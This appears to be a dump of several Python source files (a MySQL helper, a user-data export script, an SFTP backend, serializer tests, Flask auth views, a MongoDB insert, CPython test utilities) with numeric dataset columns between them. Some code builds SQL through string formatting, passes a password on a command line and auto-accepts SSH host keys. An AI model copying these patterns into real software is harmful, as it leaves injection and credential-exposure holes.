# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
Created on Sep 24, 2013
@author: paepcke
Modifications:
- Dec 30, 2013: Added closing of connection to close() method
'''
import re
import subprocess
import tempfile
import pymysql
#import MySQLdb
class MySQLDB(object):
'''
Shallow interface to MySQL databases. Some niceties nonetheless.
The query() method is an iterator. So::
for result in mySqlObj.query('SELECT * FROM foo'):
print result
'''
def __init__(self, host='127.0.0.1', port=3306, user='root', passwd='', db='mysql'):
'''
:param host: MySQL host
:type host: string
:param port: MySQL host's port
:type port: int
:param user: user to log in as
:type user: string
:param passwd: password to use for given user
:type passwd: string
:param db: database to connect to within server
:type db: string
'''
# If all arguments are set to None, we are unittesting:
if all(arg is None for arg in (host,port,user,passwd,db)):
return
self.user = user
self.pwd = passwd
self.db = db
self.cursors = []
try:
self.connection = pymysql.connect(host=host, port=port, user=user, passwd=passwd, db=db)
#self.connection = MySQLdb.connect(host=host, port=port, user=user, passwd=passwd, db=db, local_infile=1)
#except MySQLdb.OperationalError:
except pymysql.OperationalError:
pwd = '...............' if len(passwd) > 0 else '<no password>'
raise ValueError('Cannot reach MySQL server with host:%s, port:%s, user:%s, pwd:%s, db:%s' %
(host, port, user, pwd, db))
def close(self):
'''
Close all cursors that are currently still open.
'''
for cursor in self.cursors:
try:
cursor.close()
except:
pass
try:
self.connection.close()
except:
pass
def createTable(self, tableName, schema):
'''
Create new table, given its name, and schema.
The schema is a dict mappingt column names to
column types. Example: {'col1' : 'INT', 'col2' : 'TEXT'}
:param tableName: name of new table
:type tableName: String
:param schema: dictionary mapping column names to column types
:type schema: Dict<String,String>
'''
colSpec = ''
for colName, colVal in schema.items():
colSpec += str(colName) + ' ' + str(colVal) + ','
cmd = 'CREATE TABLE IF NOT EXISTS %s (%s) ' % (tableName, colSpec[:-1])
cursor = self.connection.cursor()
try:
cursor.execute(cmd)
self.connection.commit()
finally:
cursor.close()
def dropTable(self, tableName):
'''
Delete table safely. No errors
:param tableName: name of table
:type tableName: String
'''
cursor = self.connection.cursor()
try:
cursor.execute('DROP TABLE IF EXISTS %s' % tableName)
self.connection.commit()
finally:
cursor.close()
def truncateTable(self, tableName):
'''
Delete all table rows. No errors
:param tableName: name of table
:type tableName: String
'''
cursor = self.connection.cursor()
try:
cursor.execute('TRUNCATE TABLE %s' % tableName)
self.connection.commit()
finally:
cursor.close()
def insert(self, tblName, colnameValueDict):
'''
Given a dictionary mapping column names to column values,
insert the data into a specified table
:param tblName: name of table to insert into
:type tblName: String
:param colnameValueDict: mapping of column name to column value
:type colnameValueDict: Dict<String,Any>
'''
colNames, colValues = zip(*colnameValueDict.items())
cursor = self.connection.cursor()
try:
cmd = 'INSERT INTO %s (%s) VALUES (%s)' % (str(tblName), ','.join(colNames), self.ensureSQLTyping(colValues))
cursor.execute(cmd)
self.connection.commit()
finally:
cursor.close()
def bulkInsert(self, tblName, colNameTuple, valueTupleArray):
'''
Inserts large number of rows into given table. Strategy: write
the values to a temp file, then generate a LOAD INFILE LOCAL
MySQL command. Execute that command via subprocess.call().
Using a cursor.execute() fails with error 'LOAD DATA LOCAL
is not supported in this MySQL version...' even though MySQL
is set up to allow the op (load-infile=1 for both mysql and
mysqld in my.cnf).
:param tblName: table into which to insert
:type tblName: string
:param colNameTuple: tuple containing column names in proper order, i.e. \
corresponding to valueTupleArray orders.
:type colNameTuple: (str[,str[...]])
:param valueTupleArray: array of n-tuples, which hold the values. Order of\
values must corresond to order of column names in colNameTuple.
:type valueTupleArray: [(<anyMySQLCompatibleTypes>[<anyMySQLCompatibleTypes,...]])
'''
tmpCSVFile = tempfile.NamedTemporaryFile(dir='/tmp',prefix='userCountryTmp',suffix='.csv')
for valueTuple in valueTupleArray:
tmpCSVFile.write(','.join(valueTuple) + '\n')
try:
# Remove quotes from the values inside the colNameTuple's:
mySQLColNameList = re.sub("'","",str(colNameTuple))
mySQLCmd = "USE %s; LOAD DATA LOCAL INFILE '%s' INTO TABLE %s FIELDS TERMINATED BY ',' OPTIONALLY ENCLOSED BY '\"' LINES TERMINATED BY '\\n' %s" %\
(self.db, tmpCSVFile.name, tblName, mySQLColNameList)
subprocess.call(['mysql', '-u', self.user, '-p%s'%self.pwd, '-e', mySQLCmd])
finally:
tmpCSVFile.close()
def update(self, tblName, colName, newVal, fromCondition=None):
'''
Update one column with a new value.
:param tblName: name of table in which update is to occur
:type tblName: String
:param colName: column whose value is to be changed
:type colName: String
:param newVal: value acceptable to MySQL for the given column
:type newVal: type acceptable to MySQL for the given column
:param fromCondition: optionally condition that selects which rows to update.\
if None, the named column in all rows are updated to\
the given value. Syntax must conform to what may be in\
a MySQL FROM clause (don't include the 'FROM' keyword)
:type fromCondition: String
'''
cursor = self.connection.cursor()
try:
if fromCondition is None:
cmd = "UPDATE %s SET %s = '%s';" % (tblName,colName,newVal)
else:
cmd = "UPDATE %s SET %s = '%s' WHERE %s;" % (tblName,colName,newVal,fromCondition)
cursor.execute(cmd)
self.connection.commit()
finally:
cursor.close()
def ensureSQLTyping(self, colVals):
'''
Given a list of items, return a string that preserves
MySQL typing. Example: (10, 'My Poem') ---> '10, "My Poem"'
Note that ','.join(map(str,myList)) won't work:
(10, 'My Poem') ---> '10, My Poem'
:param colVals: list of column values destined for a MySQL table
:type colVals: <any>
'''
resList = []
for el in colVals:
if isinstance(el, basestring):
resList.append('"%s"' % el)
else:
resList.append(el)
return ','.join(map(str,resList))
def query(self, queryStr):
'''
Query iterator. Given a query, return one result for each
subsequent call.
:param queryStr: query
:type queryStr: String
'''
cursor = self.connection.cursor()
# For if caller never exhausts the results by repeated calls:
self.cursors.append(cursor)
cursor.execute(queryStr)
while True:
nextRes = cursor.fetchone()
if nextRes is None:
cursor.close()
return
yield nextRes
| 40.461847
| 757
| 0.60794
| 1,195
| 10,075
| 5.121339
| 0.314644
| 0.032026
| 0.019608
| 0.02549
| 0.186438
| 0.156373
| 0.128758
| 0.112909
| 0.112909
| 0.096242
| 0
| 0.006105
| 0.300943
| 10,075
| 248
| 758
| 40.625
| 0.862843
| 0.504218
| 0
| 0.431373
| 0
| 0.019608
| 0.104526
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.098039
| false
| 0.068627
| 0.039216
| 0
| 0.176471
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
13c974d988a5a072e9adfbe93d6a9ef5022a8ab3
| 1,712
|
py
|
Python
|
source/dump_query_results.py
|
CheyenneNS/metrics
|
cfeeac6d01d99679897a998b193d630ada169c61
|
[
"MIT"
] | null | null | null |
source/dump_query_results.py
|
CheyenneNS/metrics
|
cfeeac6d01d99679897a998b193d630ada169c61
|
[
"MIT"
] | null | null | null |
source/dump_query_results.py
|
CheyenneNS/metrics
|
cfeeac6d01d99679897a998b193d630ada169c61
|
[
"MIT"
] | null | null | null |
#!/usr/local/bin/python
import os
import mysql.connector as mysql
metrics_mysql_password = os.environ['METRICS_MYSQL_PWD']
sql_host = os.environ['SQL_HOST']
metrics = os.environ['QUERY_ON']
def dump_query_results():
"""
This is a simple SQL table dump of a given query so we can supply users with custom tables.
Note that the SQL query itself and column headers portion need to be changed if you want to change
the query/results. Otherwise it is good to go.
It can be called simply with the bin shell script.
Read the README at the top level for an example.
"""
#connect to mysql
db_connection = mysql.connect(
host = sql_host,#"mysql1", #"localhost",
user = "metrics", #"root",
passwd = metrics_mysql_password,
database = "metrics" #"datacamp"
)
cursor = db_connection.cursor()
query = "use "+metrics
cursor.execute(query)
#CHANGE QUERY HERE
query = "select username, display_name, email, orcid, kb_internal_user, institution, country, signup_date, last_signin_date from user_info order by signup_date"
#CHANGE COLUMN HEADERS HERE TO MATCH QUERY HEADERS
print("username\tdisplay_name\temail\torcid\tkb_internal_user\tinstitution\tcountry\tsignup_date\tlast_signin_date")
cursor.execute(query)
row_values = list()
for (row_values) in cursor:
temp_string = ""
for i in range(len(row_values) - 1):
if row_values[i] is not None:
temp_string += str(row_values[i])
temp_string += "\t"
if row_values[-1] is not None:
temp_string += str(row_values[-1])
print(temp_string)
return 1
dump_query_results()
| 33.568627
| 164
| 0.675234
| 242
| 1,712
| 4.603306
| 0.512397
| 0.056553
| 0.02693
| 0.023339
| 0.055655
| 0.055655
| 0.055655
| 0.055655
| 0
| 0
| 0
| 0.003817
| 0.234813
| 1,712
| 50
| 165
| 34.24
| 0.846565
| 0.28271
| 0
| 0.066667
| 0
| 0.033333
| 0.261163
| 0.090143
| 0
| 0
| 0
| 0
| 0
| 1
| 0.033333
| false
| 0.066667
| 0.066667
| 0
| 0.133333
| 0.066667
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
13cbb884947e5c5ee43f164c1fde11e81811776b
| 4,399
|
py
|
Python
|
osaka/storage/sftp.py
|
riverma/osaka
|
f9ed386936500303c629d7213d91215085bcf346
|
[
"Apache-2.0"
] | 2
|
2018-05-08T03:13:49.000Z
|
2022-02-09T08:48:06.000Z
|
osaka/storage/sftp.py
|
riverma/osaka
|
f9ed386936500303c629d7213d91215085bcf346
|
[
"Apache-2.0"
] | 6
|
2019-02-06T19:12:09.000Z
|
2022-02-08T04:29:49.000Z
|
osaka/storage/sftp.py
|
riverma/osaka
|
f9ed386936500303c629d7213d91215085bcf346
|
[
"Apache-2.0"
] | 12
|
2018-04-08T12:58:29.000Z
|
2022-03-31T18:35:53.000Z
|
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import division
from __future__ import absolute_import
from builtins import int
from future import standard_library
standard_library.install_aliases()
import os
import os.path
import stat
import urllib.parse
import paramiko
import traceback
import osaka.utils
"""
A backend used to handle stfp using parimiko
@author starchmd
"""
class SFTP(object):
"""
SFTP handling for Osaka
"""
def __init__(self, params={}):
"""
Constructor
"""
self.keyfile = params["keyfile"] if "keyfile" in params else None
def connect(self, host=None, port=None, user=None, password=None, secure=False):
"""
Connect to this storage medium. All data is parsed out of the url and may be None
scheme:
@param host - may be None, host to connect to
implementor must handle defaulting
@param port - may be None, port to connect to
implementor must handle a None port
@param user - may be None, user to connect as
implementor must handle a None user
@param password - may be None, password to connect with
implementor must handle a None password
"""
self.client = paramiko.client.SSHClient()
self.client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
self.client.connect(
host,
port=22 if port is None else int(port),
username=user,
password=password,
key_filename=self.keyfile,
timeout=15,
)
self.sftp = self.client.open_sftp()
@classmethod
def getSchemes(clazz):
"""
Returns a list of schemes this handler handles
Note: handling the scheme of another handler produces unknown results
@returns list of handled schemes
"""
return ["sftp"]
def put(self, path, url):
"""
Put the given path to the given url
@param path - local path of file/folder to put
@param url - url to put file/folder to
"""
rpath = urllib.parse.urlparse(url).path.lstrip("/")
print("\n\n\n\nUploading:", path)
if not os.path.isdir(path):
print("As file")
try:
self.sftp.mkdir(os.path.dirname(rpath))
except IOError:
pass
dest = rpath
try:
if stat.S_ISDIR(self.sftp.stat(rpath).st_mode) != 0:
dest = os.path.join(rpath, os.path.basename(path))
except:
pass
return self.upload(path, dest)
print("As Dir")
try:
self.sftp.mkdir(rpath)
except IOError:
pass
for dirpath, dirname, filenames in os.walk(path):
extra = os.path.relpath(dirpath, os.path.dirname(path))
try:
self.sftp.mkdir(os.path.join(rpath, extra))
except IOError:
pass
for filename in filenames:
self.upload(
os.path.join(dirpath, filename),
os.path.join(rpath, extra, filename),
)
def upload(self, path, rpath):
"""
Uploads a file to remote path
@param path - path to upload
@param rpath - remote path to upload to
"""
self.sftp.put(path, rpath)
return True
def get(self, url, path):
"""
Get the url (file/folder) to local path
@param url - url to get file/folder from
@param path - path to place fetched files
"""
rpath = urllib.parse.urlparse(url).path
try:
self.sftp.get(rpath, path)
except Exception as e:
osaka.utils.LOGGER.warning(
"Encountered exception: {}\n{}".format(e, traceback.format_exc())
)
raise osaka.utils.OsakaFileNotFound("File {} doesn't exist.".format(url))
def rm(self, url):
"""
Remove the item
@param url - url to remove
"""
rpath = urllib.parse.urlparse(url).path
self.sftp.remove(rpath)
def close(self):
"""
Close this connection
"""
self.client.close()
| 30.130137
| 90
| 0.562855
| 519
| 4,399
| 4.703276
| 0.310212
| 0.02458
| 0.032773
| 0.027038
| 0.119623
| 0.082343
| 0
| 0
| 0
| 0
| 0
| 0.001745
| 0.348716
| 4,399
| 145
| 91
| 30.337931
| 0.850262
| 0.246874
| 0
| 0.17284
| 0
| 0
| 0.034852
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.098765
| false
| 0.074074
| 0.160494
| 0
| 0.308642
| 0.049383
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
13d760267b20f874fc4b087de72759e81f401445
| 6,123
|
py
|
Python
|
servicedirectory/src/sd-api/users/tests/tests_serializers.py
|
ealogar/servicedirectory
|
fb4f4bfa8b499b93c03af589ef2f34c08a830b17
|
[
"Apache-2.0"
] | null | null | null |
servicedirectory/src/sd-api/users/tests/tests_serializers.py
|
ealogar/servicedirectory
|
fb4f4bfa8b499b93c03af589ef2f34c08a830b17
|
[
"Apache-2.0"
] | null | null | null |
servicedirectory/src/sd-api/users/tests/tests_serializers.py
|
ealogar/servicedirectory
|
fb4f4bfa8b499b93c03af589ef2f34c08a830b17
|
[
"Apache-2.0"
] | null | null | null |
'''
(c) Copyright 2013 Telefonica, I+D. Printed in Spain (Europe). All Rights
Reserved.
The copyright to the software program(s) is property of Telefonica I+D.
The program(s) may be used and or copied only with the express written
consent of Telefonica I+D or in accordance with the terms and conditions
stipulated in the agreement/contract under which the program(s) have
been supplied.
'''
from unittest import TestCase
from mock import MagicMock, patch
from commons.json_schema_validator.schema_reader import SchemaField
from commons.json_schema_validator.schema_reader import SchemaReader
from users.serializers import UserCollectionSerializer
class UserSerializerTests(TestCase):
def setUp(self):
super(UserSerializerTests, self).setUp()
mock_schema_instance = MagicMock(name='mock_schema_instance')
mock_schema_instance.return_value = [
SchemaField(name='username', field_type='string', required=True),
SchemaField(name='password', field_type='string', required=True),
SchemaField(name='is_admin', field_type='boolean', required=True, default=False)
]
mock_get_schema_fields = MagicMock(name='mock_get_schema')
mock_get_schema_fields.return_value = mock_schema_instance
# mock schema instance
schema_reader = SchemaReader()
self.patcher_validate = patch.object(schema_reader, 'validate_object') # @UndefinedVariable
self.patcher_schema = patch.object(schema_reader, # @UndefinedVariable
'get_schema_fields', mock_schema_instance)
self.patcher_schema.start()
self.patcher_validate.start()
def tearDown(self):
self.patcher_schema.stop()
self.patcher_validate.stop()
def test_deserialize_user_should_work(self):
# We need to do import here in order generic patches work
serializer = UserCollectionSerializer(data={'username': 'user', 'password': 'pass'})
self.assertEquals(True, serializer.is_valid(), "Serialization invalid")
def test_deserialize_user_invalid_is_admin_should_work(self):
# We need to do import here in order generic patches work
serializer = UserCollectionSerializer(data={'username': 'user', 'password': 'pass', 'is_admin': 'si'})
self.assertEquals(False, serializer.is_valid(), "Serialization invalid")
def test_deserialize_user_empty_user_should_give_error_invalid(self):
# We need to do import here in order generic patches work
serializer = UserCollectionSerializer(data={'username': '', 'password': 'pass'})
self.assertEquals(False, serializer.is_valid(), "Serialization invalid")
self.assertEquals(u"invalid",
serializer.errors['username'][0],
'Invalid error message')
def test_deserialize_user_null_user_should_give_required_error(self):
# We need to do import here in order generic patches work
serializer = UserCollectionSerializer(data={'password': 'pass'})
self.assertEquals(False, serializer.is_valid(), "Serialization invalid")
self.assertEquals(u"required",
serializer.errors['username'][0],
'Invalid error message')
def test_deserialize_user_large_user_ne_should_give_invalid_error(self):
# We need to do import here in order generic patches work
serializer = UserCollectionSerializer(data={'username': 'a' * 600, 'password': 'pass'})
self.assertEquals(False, serializer.is_valid(), "Serialization invalid")
self.assertEquals(u"invalid",
serializer.errors['username'][0],
'Invalid error message')
def test_deserialize_user_with_invalid_origins_should_give_error(self):
serializer = UserCollectionSerializer(data={'username': 'user', 'password': 'pass', 'origins': ["????"]})
self.assertEquals(False, serializer.is_valid())
self.assertEquals(u"invalid",
serializer.errors['origins'][0],
'Invalid error message')
serializer = UserCollectionSerializer(data={'username': 'user', 'password': 'pass', 'origins': [" tugo"]})
self.assertEquals(False, serializer.is_valid())
self.assertEquals(u"invalid",
serializer.errors['origins'][0],
'Invalid error message')
def test_deserialize_user_with_invalid_classes_should_give_error(self):
serializer = UserCollectionSerializer(data={'username': 'user', 'password': 'pass', 'classes': ["????"]})
self.assertEquals(False, serializer.is_valid())
self.assertEquals(u"invalid",
serializer.errors['classes'][0],
'Invalid error message')
serializer = UserCollectionSerializer(data={'username': 'user', 'password': 'pass', 'classes': [" sms"]})
self.assertEquals(False, serializer.is_valid())
self.assertEquals(u"invalid",
serializer.errors['classes'][0],
'Invalid error message')
def test_deserialize_user_invalid_username_should_give_error(self):
# We need to do import here in order generic patches work
serializer = UserCollectionSerializer(data={'username': 'User.user', 'password': 'pass'})
self.assertEquals(False, serializer.is_valid(), "Serialization invalid")
self.assertEquals(u"invalid",
serializer.errors['username'][0],
'Invalid error message')
def test_deserialize_user_invalid_is_admin_should_give_error(self):
# We need to do import here in order generic patches work
serializer = UserCollectionSerializer(data={'username': 'usera', 'password': 'pass', 'is_admin': 0})
self.assertEquals(False, serializer.is_valid(), "Serialization invalid")
self.assertEquals(u"invalid",
serializer.errors['is_admin'][0],
'Invalid error message')
| 52.784483
| 114
| 0.6634
| 654
| 6,123
| 6.022936
| 0.19419
| 0.081239
| 0.106118
| 0.116781
| 0.693069
| 0.687992
| 0.669713
| 0.648388
| 0.606245
| 0.567149
| 0
| 0.003606
| 0.230116
| 6,123
| 115
| 115
| 53.243478
| 0.83199
| 0.136534
| 0
| 0.421687
| 0
| 0
| 0.16926
| 0
| 0
| 0
| 0
| 0
| 0.240964
| 1
| 0.13253
| false
| 0.144578
| 0.060241
| 0
| 0.204819
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
13d7896d6d799cba6c0e766504d5f3eea5f2e531
| 3,124
|
py
|
Python
|
Web/notifyXAPI/app/src/users/views.py
|
abs0lut3pwn4g3/RootersCTF2019-challenges
|
397a6fad0b03e55541df06e5103172ae850cd4e5
|
[
"MIT"
] | 14
|
2019-10-13T07:38:04.000Z
|
2022-02-13T09:03:50.000Z
|
Web/notifyXAPI/app/src/users/views.py
|
abs0lut3pwn4g3/RootersCTF2019-challenges
|
397a6fad0b03e55541df06e5103172ae850cd4e5
|
[
"MIT"
] | 1
|
2019-10-13T07:35:13.000Z
|
2019-10-13T08:22:48.000Z
|
Web/notifyXAPI/app/src/users/views.py
|
abs0lut3pwn4g3/RootersCTF2019-challenges
|
397a6fad0b03e55541df06e5103172ae850cd4e5
|
[
"MIT"
] | 4
|
2019-10-13T08:21:43.000Z
|
2022-01-09T16:39:33.000Z
|
''' User views '''
from datetime import timedelta
from flask import request, jsonify, make_response, redirect, json, render_template
from flask_jwt_extended import (create_access_token, jwt_required)
from flask_restful import Resource
from flask_login import login_user, current_user
from sqlalchemy.exc import IntegrityError, InvalidRequestError
from src import db, api
from .models import User
from .schemas import UserSchema
class UserLoginResource(Resource):
model = User
schema = UserSchema
def get(self):
return make_response(render_template('login.html'))
def post(self):
if request.json:
data = request.json
user = self.model.query.filter(self.model.email == data['email']).first()
if user and self.model.check_password(user, data['password']):
expires = timedelta(days=365)
user = UserSchema(only=('id', 'email', 'is_admin')).dump(user).data
return make_response(
jsonify({'id': user,
'authentication_token': create_access_token(identity=user['id'], expires_delta=expires)}), 200)
else:
return make_response(jsonify({"error": {"code": 400, "msg": "No such user/wrong password."}}), 400)
else:
data = request.form
user = self.model.query.filter(self.model.email == data['email']).first()
if user and self.model.check_password(user, data['password']) and login_user(user):
return make_response(redirect('/admin/', 302))
else:
return make_response(redirect('/api/v1/login', 403))
class UserRegisterResource(Resource):
model = User
schema = UserSchema
def post(self):
data = request.json
if not data:
return make_response(jsonify({'error': 'No data'}), 400)
user = User.query.filter(User.email == data['email']).first()
if user:
return make_response(jsonify({'error': 'User already exists'}), 403)
user, errors = self.schema().load(data)
if errors:
return make_response(jsonify(errors), 400)
try:
user.set_password(data['password'])
db.session.add(user)
db.session.commit()
except (IntegrityError, InvalidRequestError) as e:
print(e)
db.session.rollback()
return make_response(jsonify(error={'code': 400 }), 400)
expires = timedelta(days=365)
return make_response(
jsonify(created_user={'id': user.id,
'user': self.schema(only=('id', 'email', 'is_admin')).dump(user).data,
'authentication_token': create_access_token(identity=user.id,
expires_delta=expires)}), 200)
api.add_resource(UserLoginResource, '/login/', endpoint='login')
api.add_resource(UserRegisterResource, '/register/', endpoint='register')
| 40.571429
| 124
| 0.588348
| 336
| 3,124
| 5.354167
| 0.28869
| 0.073374
| 0.100056
| 0.097276
| 0.367982
| 0.31851
| 0.264591
| 0.223457
| 0.190106
| 0.190106
| 0
| 0.018165
| 0.295134
| 3,124
| 77
| 125
| 40.571429
| 0.798819
| 0.003201
| 0
| 0.274194
| 0
| 0
| 0.08336
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.048387
| false
| 0.064516
| 0.145161
| 0.016129
| 0.451613
| 0.016129
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
13e10f247a53a809b100dc05b97804f51f30b05a
| 463
|
py
|
Python
|
server/form/mongo.py
|
SRM-IST-KTR/ossmosis
|
06e375dfdd67f91286ffbcb13e04b6543585d8ad
|
[
"MIT"
] | 6
|
2021-07-04T07:59:17.000Z
|
2021-07-04T14:41:00.000Z
|
server/form/mongo.py
|
SRM-IST-KTR/ossmosis
|
06e375dfdd67f91286ffbcb13e04b6543585d8ad
|
[
"MIT"
] | null | null | null |
server/form/mongo.py
|
SRM-IST-KTR/ossmosis
|
06e375dfdd67f91286ffbcb13e04b6543585d8ad
|
[
"MIT"
] | 1
|
2022-02-15T13:31:46.000Z
|
2022-02-15T13:31:46.000Z
|
import os
from pymongo import MongoClient
from dotenv import load_dotenv
def database_entry(data):
try:
load_dotenv()
mongo_string = os.getenv('MONGODB_AUTH_URI')
client = MongoClient(mongo_string)
database = client[os.getenv('MONGODB_DB')]
col = database['users']
col.insert_one(data)
return True
except Exception as e:
print(e)
return False
if __name__ == "__main__":
pass
| 21.045455
| 52
| 0.637149
| 56
| 463
| 4.964286
| 0.642857
| 0.071942
| 0.107914
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.278618
| 463
| 21
| 53
| 22.047619
| 0.832335
| 0
| 0
| 0
| 0
| 0
| 0.084233
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.058824
| false
| 0.058824
| 0.176471
| 0
| 0.352941
| 0.058824
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
13efdb45818b7da3afae845201256a86d37c940d
| 4,302
|
py
|
Python
|
Lib/test/libregrtest/utils.py
|
oskomorokhov/cpython
|
c0e11a3ceb9427e09db4224f394c7789bf6deec5
|
[
"0BSD"
] | 5
|
2017-08-25T04:31:30.000Z
|
2022-03-22T15:01:56.000Z
|
Lib/test/libregrtest/utils.py
|
oskomorokhov/cpython
|
c0e11a3ceb9427e09db4224f394c7789bf6deec5
|
[
"0BSD"
] | 20
|
2021-03-25T12:52:42.000Z
|
2022-03-01T02:02:03.000Z
|
Lib/test/libregrtest/utils.py
|
oskomorokhov/cpython
|
c0e11a3ceb9427e09db4224f394c7789bf6deec5
|
[
"0BSD"
] | 3
|
2020-04-13T14:41:31.000Z
|
2022-03-02T18:56:32.000Z
|
import math
import os.path
import sys
import textwrap
from test import support
def format_duration(seconds):
ms = math.ceil(seconds * 1e3)
seconds, ms = divmod(ms, 1000)
minutes, seconds = divmod(seconds, 60)
hours, minutes = divmod(minutes, 60)
parts = []
if hours:
parts.append('%s hour' % hours)
if minutes:
parts.append('%s min' % minutes)
if seconds:
if parts:
# 2 min 1 sec
parts.append('%s sec' % seconds)
else:
# 1.0 sec
parts.append('%.1f sec' % (seconds + ms / 1000))
if not parts:
return '%s ms' % ms
parts = parts[:2]
return ' '.join(parts)
def removepy(names):
if not names:
return
for idx, name in enumerate(names):
basename, ext = os.path.splitext(name)
if ext == '.py':
names[idx] = basename
def count(n, word):
if n == 1:
return "%d %s" % (n, word)
else:
return "%d %ss" % (n, word)
def printlist(x, width=70, indent=4, file=None):
"""Print the elements of iterable x to stdout.
Optional arg width (default 70) is the maximum line length.
Optional arg indent (default 4) is the number of blanks with which to
begin each line.
"""
blanks = ' ' * indent
# Print the sorted list: 'x' may be a '--random' list or a set()
print(textwrap.fill(' '.join(str(elt) for elt in sorted(x)), width,
initial_indent=blanks, subsequent_indent=blanks),
file=file)
def print_warning(msg):
support.print_warning(msg)
orig_unraisablehook = None
def regrtest_unraisable_hook(unraisable):
global orig_unraisablehook
support.environment_altered = True
print_warning("Unraisable exception")
old_stderr = sys.stderr
try:
sys.stderr = sys.__stderr__
orig_unraisablehook(unraisable)
finally:
sys.stderr = old_stderr
def setup_unraisable_hook():
global orig_unraisablehook
orig_unraisablehook = sys.unraisablehook
sys.unraisablehook = regrtest_unraisable_hook
def clear_caches():
# Clear the warnings registry, so they can be displayed again
for mod in sys.modules.values():
if hasattr(mod, '__warningregistry__'):
del mod.__warningregistry__
# Flush standard output, so that buffered data is sent to the OS and
# associated Python objects are reclaimed.
for stream in (sys.stdout, sys.stderr, sys.__stdout__, sys.__stderr__):
if stream is not None:
stream.flush()
# Clear assorted module caches.
# Don't worry about resetting the cache if the module is not loaded
try:
distutils_dir_util = sys.modules['distutils.dir_util']
except KeyError:
pass
else:
distutils_dir_util._path_created.clear()
try:
re = sys.modules['re']
except KeyError:
pass
else:
re.purge()
try:
_strptime = sys.modules['_strptime']
except KeyError:
pass
else:
_strptime._regex_cache.clear()
try:
urllib_parse = sys.modules['urllib.parse']
except KeyError:
pass
else:
urllib_parse.clear_cache()
try:
urllib_request = sys.modules['urllib.request']
except KeyError:
pass
else:
urllib_request.urlcleanup()
try:
linecache = sys.modules['linecache']
except KeyError:
pass
else:
linecache.clearcache()
try:
mimetypes = sys.modules['mimetypes']
except KeyError:
pass
else:
mimetypes._default_mime_types()
try:
filecmp = sys.modules['filecmp']
except KeyError:
pass
else:
filecmp._cache.clear()
try:
struct = sys.modules['struct']
except KeyError:
pass
else:
struct._clearcache()
try:
doctest = sys.modules['doctest']
except KeyError:
pass
else:
doctest.master = None
try:
ctypes = sys.modules['ctypes']
except KeyError:
pass
else:
ctypes._reset_cache()
try:
typing = sys.modules['typing']
except KeyError:
pass
else:
for f in typing._cleanups:
f()
support.gc_collect()
| 22.761905
| 75
| 0.600418
| 510
| 4,302
| 4.933333
| 0.35098
| 0.051669
| 0.085851
| 0.104928
| 0.022258
| 0
| 0
| 0
| 0
| 0
| 0
| 0.009015
| 0.303812
| 4,302
| 188
| 76
| 22.882979
| 0.831052
| 0.125291
| 0
| 0.381295
| 0
| 0
| 0.051701
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.057554
| false
| 0.086331
| 0.035971
| 0
| 0.129496
| 0.035971
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
